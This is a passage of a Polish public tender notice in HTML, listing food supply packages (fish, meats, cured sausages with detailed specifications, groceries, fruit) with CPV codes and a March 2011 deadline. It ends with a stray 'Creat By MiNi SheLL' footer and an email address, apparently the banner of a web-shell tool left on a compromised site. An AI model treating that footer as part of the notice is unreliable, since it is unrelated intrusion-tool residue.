28. Papryka - 5 kg.;
29. Banany - 10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.21.00-1, 03.22.21.11-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7 - OWOCE SPROSZKOWANE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Aronia - koncentrat 100g - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - MROŻONKI I RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z ryby mrożony (mintaj) - 300 kg.;
2. Śledzie solone - 35 kg.;
3. Makrela wędzona - 15 kg.;
4. Kalafior mrożony - 10 kg.;
5. Fasola szparagowa mrożona - 10 kg.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 03.31.10.00-2, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 9 - MIĘSA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wieprzowina gulaszowa - 1100 kg.;
2. Wołowina gulaszowa - 250 kg.;
3. Wieprzowina tłusta - 250 kg.;
4. Kości - 10 kg.;
5. Schab b /k - 500 kg.;
6. Żeberka - 150 kg.;
7. Słonina - 60 kg.;
8. Wątroba wieprzowa - 250 kg.;
9. Karczek - 250 kg.;
10. Od szynki - 25 kg.;
11. Wołowina bitkowa - 50 kg.;
12. Antrykot - 60 kg.;
13. Pachwina wędzona - 10 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 10 - DRÓB..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ćwiartka kurczaka 0,45kg - 1700 kg.;
2. Filet drobiowy - 350 kg.;
3. Porcje rosołowe - 600 kg.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 11 - WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, klipsowane. Powierzchnia batonu gładka od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw. (Krakowska lub równoważna) - 400 kg.;
2. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, kliprowane, cienki batorn. Powierzchnia batonu gładka od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw (Rawska lub równoważna) - 180 kg.;
3. Wyrób średnio rozdrobniony z mięsa wieprzowego poddany parzeniu w osłonce barierowej o średnicy 73 mm., wyrób chudy, wyczuwalne przyprawy. Trwałość 14 dni. (Zielonogórska lub równoważna) - 145 kg.;
4. Łopatka prasowana w bloku -od 3-5 kg niedopuszczalny jest smak i zapach świadczące o nieświeżości produktu. Konsystencja ścisła, nierozpadająca się, barwa w przekroju jasnoróżowa, kiełbasa średnio rozdrobniona wieprzowa, wędzona parzona. (Łopatkowa lub równoważna) - 145 kg.;
5. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, przewiązanych przędzą wzdłuż i w poprzek, końce osłonek związane przędzą. Powierzchnia batonu gładka, barwy od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Barwa na przekroju charakterystyczna dla użytych mięśni wieprzowych peklowanych. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw. (Szynkówka lub równoważna) - 260 kg.;
6. Produkty parzone, wyprodukowane z mięsa wieprzowego peklowanego z dodatkiem przypraw i surowców uzupełniających. Batony w osłonkach sztucznych, kliprowane. Powierzchnia batonu gładka, kształt właściwy dla użytej osłonki i formy. Barwa na przekroju charakterystyczna dla użytego mięsa peklowanego; mięso od bladoróżowej do ciemnoczerwonej. Smak i zapach charakterystyczny dla wędliny parzonej z mięsa wieprzowego oraz dodanych przypraw i surowców uzupełniających. (Dębicka lub równoważna) - 110 kg.;
7. Wyrób z mięsa wieprzowego grubo rozdrobnionego w białkowej osłonce o średnicy 65 mm. Batony o długości 30 cm poddane procesowi wędzenia i parzenia. Trwałość 14 dni. (Śniadaniowa lub równoważna) - 220 kg.;
8. Wędlina średnio rozdrobniona, wyprodukowana z peklowanego mięsa wieprzowego i wołowego. Batony w osłonkach białkowych, klipsowane. Powierzchnia batonu gładka, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków. (Piwna lub równoważna) - 60 kg.;
9. Produkty parzone, wyprodukowane z mięsa wieprzowego peklowanego z dodatkiem przypraw i surowców uzupełniających. Batony w osłonkach sztucznych, kliprowane. Powierzchnia batonu gładka, kształt właściwy dla użytej osłonki i formy. Barwa na przekroju charakterystyczna dla użytego mięsa peklowanego; mięso od bladoróżowej do ciemnoczerwonej. Smak i zapach charakterystyczny dla wędliny parzonej z mięsa wieprzowego oraz dodanych przypraw i surowców uzupełniających. (Tyrolska lub równoważna) - 20 kg.;
10. Kiełbasa średnio rozdrobniona, wędzona, parzona, otrzymana z mięsa wieprzowego i wołowego, peklowanego. Batony w jelitach wieprzowych cienkich, odkręcane w odcinki - krótkie. Powierzchnia batonu od jasnobrązowej do ciemnobrązowej, osłonka pomarszczona. Na przekroju surowce równomiernie rozłożone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego i wołowego oraz użytych przypraw. (Domowa lub równoważna ) - 100 kg.;
11. Parówka wieprzowa cienka-paluszek - 110 kg.;
12. Pieczeń wieprzowa - 75 kg.;
13. Pasztet w foremce - 40 kg.;
14. Kaszanka - 60 kg.;
15. Wędzonka wieprzowa parzona. Wędzonka otrzymana z części szynki wieprzowej peklowanej bez kości, wędzona, parzona. Wędzonka osznurowana wzdłuż i w poprzek; barwa mięsa różowa do blado czerwonej, barwa tłuszczu biała do jasno żółtej, częściowo pokryta warstewką tłuszczu. (Ogonówka lub równoważny) - 12 kg.;
16. Szynka gotowana - 16 kg.;
17. Pieczeń rzymska - 50 kg.;
18. Mortadela - 80 kg.;
19. Wędlina drobiowa - 200 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 12 - PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mąka ziemniaczana 1kg - 10 kg.;
2. Mąka kukurydziana - 3 kg.;
3. Płatki kukurydziane 250g - 5 szt.;
4. Drożdże 100g - 20 szt.;
5. Deser owocowy 100g - 100 szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.22.00-3, 15.61.33.11-1, 15.89.80.00-9, 15.83.31.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 13 - OWOCE ŚWIEŻE I SEZONOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Truskawka - 20 kg.;
2. Czarna porzeczka - 30 kg.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.23.13-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com